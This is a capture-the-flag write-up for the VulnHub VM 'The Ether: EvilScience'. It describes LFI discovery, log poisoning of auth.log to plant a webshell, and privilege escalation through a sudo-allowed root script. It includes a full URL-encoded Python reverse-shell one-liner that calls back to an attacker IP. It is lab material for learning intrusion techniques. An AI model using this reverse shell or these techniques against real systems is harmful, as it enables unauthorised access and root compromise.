Hi everyone, this is my solution for the VulnHub VM, The Ether: EvilScience.

Link: https://www.vulnhub.com/entry/the-ether-evilscience,212/

UPDATE (1/12/2017): As per the creator of this challenge, the Vulnhub version of this VM is faulty and has not been updated.

If you’re having issues please re-download the updated version from the authors site.

First steps as always is getting the IP of the VM using netdiscover

Quick Nmap scan to find how we can interact with the VM.

Browsing to port 80 we find what looks like could be a vulnerable include for an LFI/RFI

I spent far too long trying to get an LFI working on ‘/etc/passwd’. I used dotdotpwn a few times, trying different attempts at beating the filter with and without nullbytes (%00) without success. I eventually looked up some LFI cheat sheets for commonly accessible files and ran a list of these through burpsuite, trying different filters. Eventually finding that /var/log/auth.log was accessible through the LFI vector.

With this LFI available, we can use log poisoning to attempt to get remote code execution and a shell. Firstly injecting a simple webshell into the SSH auth.log by attempting to log in with a bad username.

From here we can call our webshell through the previously discovered LFI.

Seeing a Python script, I assume python is easily available so went with a Python reverse shell dropped through the LFI. The string is URL encoded with hackbar to prevent any issues.

python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.1.0.5%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22/bin/sh%22,%22-i%22%5D);'

We can see an interesting Python script with a setuid bit set. Checking “sudo –list” shows us that we dont need a password to run it. Awesome!

Looks like when this script retrieves the log file you can also pipe commands onto the end and they will run as root as well. To check this I made a python script in /tmp that would ‘touch /tmp/testing’. Running this script with the xxxlogauditorxxx.py file generated a /tmp/testing file with root:root permissions.

Should just be able to get it to fire back another reverse shell and we should have root! The following shell script was made to spawn a revshell.

I used wget to retrieve it from my Kali box and give it executable permissions.

From here, I called the Python script and piped to the end my reverse shell.

This fired the reverse shell with root privileges! The flag is a .png file so I copied it to the web directory to grab it via the browser.

But… It’s not actually the flag.

Running strings against the flag.png file gives us some base64 encoded data that reveals the actual flag, the story of “The Ether”.

Running the flag through base64 decode we get the following